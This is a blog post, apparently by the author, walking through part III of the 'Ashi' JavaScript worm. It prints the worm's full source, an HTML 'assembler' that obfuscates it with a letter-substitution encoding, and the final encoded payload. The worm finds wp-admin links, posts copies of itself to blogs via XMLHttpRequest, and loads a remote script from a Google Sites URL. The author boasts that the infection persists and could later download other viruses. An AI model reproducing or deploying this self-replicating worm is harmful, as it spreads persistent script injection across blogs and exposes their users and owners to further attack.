View RSS Feed

prashant_uniyal

Demystifying The Ashi virus--"vinnu" PART III

Rating: 3 votes, 2.67 average.
Now I just need to scramble the code. For this purpose I created a HTML file containing the code and encoder and decoder. This file will assemble the virus and will provide us the viral code. The HTML code is:
<html>
<head><title>Ashi assmebler by "vinnu"</title>
<script language=javascript>
var ashi='trigger();function trigger(){var
vin=document.getElementsByTagName(\"a\");var total=0;var index=0;var
address;for(var iter=0;iter<vin.length;iter++)
{if((index=vin[iter].href.indexOf(\"wp-admin\"))!=-1)
{address=vin[iter].href.substring(0,index+8)+\"/post.php\";blog(address);}}}functi
on blog(addr){var encodr=\"function y(x){var s=\\"\\",r=\\"\\";for(var
i=0;i<x.length;i++){s=x.charAt(i);if(s==\\"\\x51\\ "){s=\\"\\x25\\";}else
if(s==\\"\\x5A\\"){s=\\"\\x69\\";}else if(s==\\"\\x4A\\"){s=\\"\\x61\\";}else
if(s==\\"\\x46\\"){s=\\"\\x74\\";}else{s=x.charAt( i);}r+=s;}r=unescape(r);return
r;}\";var nunnu=\"><scr\"+\"ipt language=javascript\"+\"
src=\\"http://sites.google.com/site/cyberspecies/n/ibibo.js\\"></scr\"+\"ipt><a
href=\\"\\" onmouseover=javascript:eval(y(ashi));>jaijeya</a><a \";var
no=Math.floor(Math.random()*10);var quote=new Array(10);quote[0]=\"Sahdi bhasa
sahdi jaan...\";quote[1]=\"Dont you think we can...\";quote[2]=\"Thats the
attitude...Keep it up.\";quote[3]=\"Intelligent?..\";quote[4]=\"Main koi machine
thodi hai...\";quote[5]=\"jaijeya ji! Theek hainn na?...\";quote[6]=\"Veero!
Tusaan Eh bhi parhi leya\";quote[7]=\"Himachal a heaven...\";quote[8]=\"Free
Tibet...\";quote[9]=\"Paharhi!lovely language...\";var
blpayload=\"post_title=\"+quote[no];blpayload+=\"&content=jaijeya></p></div\";blpa
yload+=encodeURIComponent(\"><\"+\"sc\"+\"ript language=javascript>var
ashi=\'\"+ashi+\"\';eval(y(ashi));\"+encodr+\"<\"+ \"/sc\"+\"ript><a \");blpayload+
=encodeURIComponent(nunnu);blpayload+=\"hor&tags_i nput=&action=post-quickpresssave&
quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&s ave=Save
%20Draft&=Cancel&publish=Publish\";ajaxPSLV(addr,b lpayload);}function
ajaxPSLV(url,payload){var xmlhttp;if(window.XMLHttpRequest){xmlhttp=new
XMLHttpRequest();}else if(window.ActiveXObject){try{xmlhttp=new
ActiveXObject(\"Microsoft.XMLHTTP\");}catch(e){try {xmlhttp=new
ActiveXObject(\"Msxml2.XMLHTTP\");}catch(e){return ;}}}xmlhttp.open(\"POST\", url,
true);xmlhttp.setRequestHeader(\"Content-Type\",\"application/x-www-formurlencoded\");
xmlhttp.setRequestHeader(\"Contentlength\",
payload.length);xmlhttp.send(payload);}';
ashi = z(ashi);
var fuse = ';function y(x){var s=\"\",r=\"\";for(var i=0;i<x.length;i+
+){s=x.charAt(i);if(s==\"Q\"){s=\"%\";}else if(s==\"Z\"){s=\"i\";}else
if(s==\"J\"){s=\"a\";}else if(s==\"F\")
{s=\"t\";}else{s=x.charAt(i);}r+=s;}r=unescape(r); return
r; };eval(y(ashi));alert(\"Decoded and executed: \"+y(ashi));';
var assembledAshi = "javascript:var ashi='"+z(ashi)+"'"+fuse;
var vhtml = "<P><PRE>" + assembledAshi+"</PRE></P>";
function z(x) {x=escape(x);var s="",r="";for(var i=0;i<x.length;i+
+){ s=x.charAt(i); if(s=="%"){s="Q";}else if(s=="i"){s="Z"}else if(s=="a")
{s="J";}else if(s=="t"){s="F";}else{s=x.charAt(i);}r+=s;}return r; }
function y(x) {var s="",r="";for(var i=0;i<x.length;i++)
{ s=x.charAt(i); if(s=="Q"){s="%";}else if(s=="Z"){s="i";}else if(s=="J")
{s="a";}else if(s=="F"){s="t";}else{s=x.charAt(i);}r+=s;}r=unes cape(r);return
r; }
</script>
</head>
<body>
<H1>The Ashi virus Assembler.</H1>
<HR>
<br>
<div id="viraldiv"><H3> love you nunnu</H3>
The viral Code:<BR><HR>
<script language=javascript>document.write(vhtml);</script>
<HR>
<div>
</body>
</html>

And the final assembled code is:
javascript:var
ashi='FrZggerQ28Q29Q3BfuncFZonQ20FrZggerQ28Q29Q7Bv JrQ20vZnQ3DdocumenF.geFElemenFsB
yTJgNJmeQ28Q22JQ22Q29Q3BvJrQ20FoFJlQ3D0Q3BvJrQ20Zn dexQ3D0Q3BvJrQ20JddressQ3BforQ28
vJrQ20ZFerQ3D0Q3BZFerQ3CvZn.lengFhQ3BZFer+
+Q29Q7BZfQ28Q28ZndexQ3DvZnQ5BZFerQ5D.href.ZndexOfQ 28Q22wp-JdmZnQ22Q29Q29Q21Q3D-
1Q29Q7BJddressQ3DvZnQ5BZFerQ5D.href.subsFrZngQ280Q 2CZndex+8Q29+Q22/posF.phpQ22Q3Bb
logQ28JddressQ29Q3BQ7DQ7DQ7DfuncFZonQ20blogQ28Jddr Q29Q7BvJrQ20encodrQ3DQ22funcFZon
Q20yQ28xQ29Q7BvJrQ20sQ3DQ5CQ22Q5CQ22Q2CrQ3DQ5CQ22Q 5CQ22Q3BforQ28vJrQ20ZQ3D0Q3BZQ3C
x.lengFhQ3BZ+
+Q29Q7BsQ3Dx.chJrAFQ28ZQ29Q3BZfQ28sQ3DQ3DQ5CQ22Q5C x51Q5CQ22Q29Q7BsQ3DQ5CQ22Q5Cx25Q
5CQ22Q3BQ7DelseQ20ZfQ28sQ3DQ3DQ5CQ22Q5Cx5AQ5CQ22Q2 9Q7BsQ3DQ5CQ22Q5Cx69Q5CQ22Q3BQ7D
elseQ20ZfQ28sQ3DQ3DQ5CQ22Q5Cx4AQ5CQ22Q29Q7BsQ3DQ5C Q22Q5Cx61Q5CQ22Q3BQ7DelseQ20ZfQ2
8sQ3DQ3DQ5CQ22Q5Cx46Q5CQ22Q29Q7BsQ3DQ5CQ22Q5Cx74Q5 CQ22Q3BQ7DelseQ7BsQ3Dx.chJrAFQ28
ZQ29Q3BQ7Dr+Q3DsQ3BQ7DrQ3DunescJpeQ28rQ29Q3BreFurn Q20rQ3BQ7DQ22Q3BvJrQ20nunnuQ3DQ2
2Q3EQ3CscrQ22+Q22ZpFQ20lJnguJgeQ3DjJvJscrZpFQ22+Q2 2Q20srcQ3DQ5CQ22hFFpQ3A//sZFes.g
oogle.com/sZFe/cyberspecZes/n/ZbZbo.jsQ5CQ22Q3EQ3C/scrQ22+Q22ZpFQ3EQ3CJQ20hrefQ3DQ
5CQ22Q5CQ22Q20onmouseoverQ3DjJvJscrZpFQ3AevJlQ28yQ 28JshZQ29Q29Q3BQ3EjJZjeyJQ3C/JQ3
EQ3CJQ20Q22Q3BvJrQ20noQ3DMJFh.floorQ28MJFh.rJndomQ 28Q29*10Q29Q3BvJrQ20quoFeQ3DnewQ
20ArrJyQ2810Q29Q3BquoFeQ5B0Q5DQ3DQ22SJhdZQ20bhJsJQ 20sJhdZQ20jJJn...Q22Q3BquoFeQ5B1
Q5DQ3DQ22DonFQ20youQ20FhZnkQ20weQ20cJn...Q22Q3Bquo FeQ5B2Q5DQ3DQ22ThJFsQ20FheQ20JFF
ZFude...KeepQ20ZFQ20up.Q22Q3BquoFeQ5B3Q5DQ3DQ22InF ellZgenFQ3F..Q22Q3BquoFeQ5B4Q5DQ
3DQ22MJZnQ20koZQ20mJchZneQ20FhodZQ20hJZ...Q22Q3Bqu oFeQ5B5Q5DQ3DQ22jJZjeyJQ20jZQ21Q
20TheekQ20hJZnnQ20nJQ3F...Q22Q3BquoFeQ5B6Q5DQ3DQ22 VeeroQ21Q20TusJJnQ20EhQ20bhZQ20p
JrhZQ20leyJQ22Q3BquoFeQ5B7Q5DQ3DQ22HZmJchJlQ20JQ20 heJven...Q22Q3BquoFeQ5B8Q5DQ3DQ2
2FreeQ20TZbeF...Q22Q3BquoFeQ5B9Q5DQ3DQ22PJhJrhZQ21 lovelyQ20lJnguJge...Q22Q3BvJrQ20
blpJyloJdQ3DQ22posF_FZFleQ3DQ22+quoFeQ5BnoQ5DQ3Bbl pJyloJd+Q3DQ22Q26conFenFQ3DjJZje
yJQ3EQ3C/pQ3EQ3C/dZvQ22Q3BblpJyloJd+Q3DencodeURIComponenFQ28Q22Q3EQ 3CQ22+Q22scQ22+
Q22rZpFQ20lJnguJgeQ3DjJvJscrZpFQ3EvJrQ20JshZQ3DQ27 Q22+JshZ+Q22Q27Q3BevJlQ28yQ28Jsh
ZQ29Q29Q3BQ22+encodr+Q22Q3CQ22+Q22/scQ22+Q22rZpFQ3EQ3CJQ20Q22Q29Q3BblpJyloJd+Q3Den
codeURIComponenFQ28nunnuQ29Q3BblpJyloJd+Q3DQ22horQ 26FJgs_ZnpuFQ3DQ26JcFZonQ3DposFquZckpresssJveQ26qu Zckpress_
posF_IDQ3D0Q26_wpnonceQ3DQ26_wp_hFFp_refererQ3DQ26 sJveQ3DSJveQ25
20DrJfFQ26Q3DCJncelQ26publZshQ3DPublZshQ22Q3BJjJxP SLVQ28JddrQ2CblpJyloJdQ29Q3BQ7Df
uncFZonQ20JjJxPSLVQ28urlQ2CpJyloJdQ29Q7BvJrQ20xmlh FFpQ3BZfQ28wZndow.XMLHFFpRequesF
Q29Q7BxmlhFFpQ3DnewQ20XMLHFFpRequesFQ28Q29Q3BQ7Del seQ20ZfQ28wZndow.AcFZveXObjecFQ2
9Q7BFryQ7BxmlhFFpQ3DnewQ20AcFZveXObjecFQ28Q22MZcro sofF.XMLHTTPQ22Q29Q3BQ7DcJFchQ28
eQ29Q7BFryQ7BxmlhFFpQ3DnewQ20AcFZveXObjecFQ28Q22Ms xml2.XMLHTTPQ22Q29Q3BQ7DcJFchQ28
eQ29Q7BreFurnQ3BQ7DQ7DQ7DxmlhFFp.openQ28Q22POSTQ22 Q2CQ20urlQ2CQ20FrueQ29Q3BxmlhFFp
.seFRequesFHeJderQ28Q22ConFenF-TypeQ22Q2CQ22JpplZcJFZon/x-www-formurlencodedQ22Q29Q3BxmlhFFp.
seFRequesFHeJderQ28Q22ConFenFlengFhQ22Q2CpJyloJd.
lengFhQ29Q3BxmlhFFp.sendQ28pJyloJdQ29Q3BQ7D';funct ion y(x){var
s="",r="";for(var i=0;i<x.length;i++){s=x.charAt(i);if(s=="Q"){s="%" ;}else
if(s=="Z"){s="i";}else if(s=="J"){s="a";}else if(s=="F")
{s="t";}else{s=x.charAt(i);}r+=s;}r=unescape(r);re turn
r; };eval(y(ashi));alert("Decoded and executed: "+y(ashi));

The last alert has been added to the above viral code to make sure that the virus is properly triggered. It is not a part of virus and will not be replicated. And thats it. The "Ashi" virus..."vinnu" I have informed ibibo about this virus.
This virus is a very good example of artificial living organizms helping each other for their living. For example, they have stopped the new blog posts to be submitted now, but They haven't yet removed the infection and virus is still on blogs. And this virus having a stage two also available for retrieval of the code. So either it can be upgraded to exploit other vulnerabilities or can also be used to download another virus to already infected blogs and keep the infection one step ahead of the developers reach...."vinnu"
Thanx a lot..."vinnu"
------------------------------------------------------------------------------------------------------------------------------------










Tags: None Add / Edit Tags
Categories
Uncategorized

Comments

Trackbacks

Total Trackbacks 0
Trackback URL: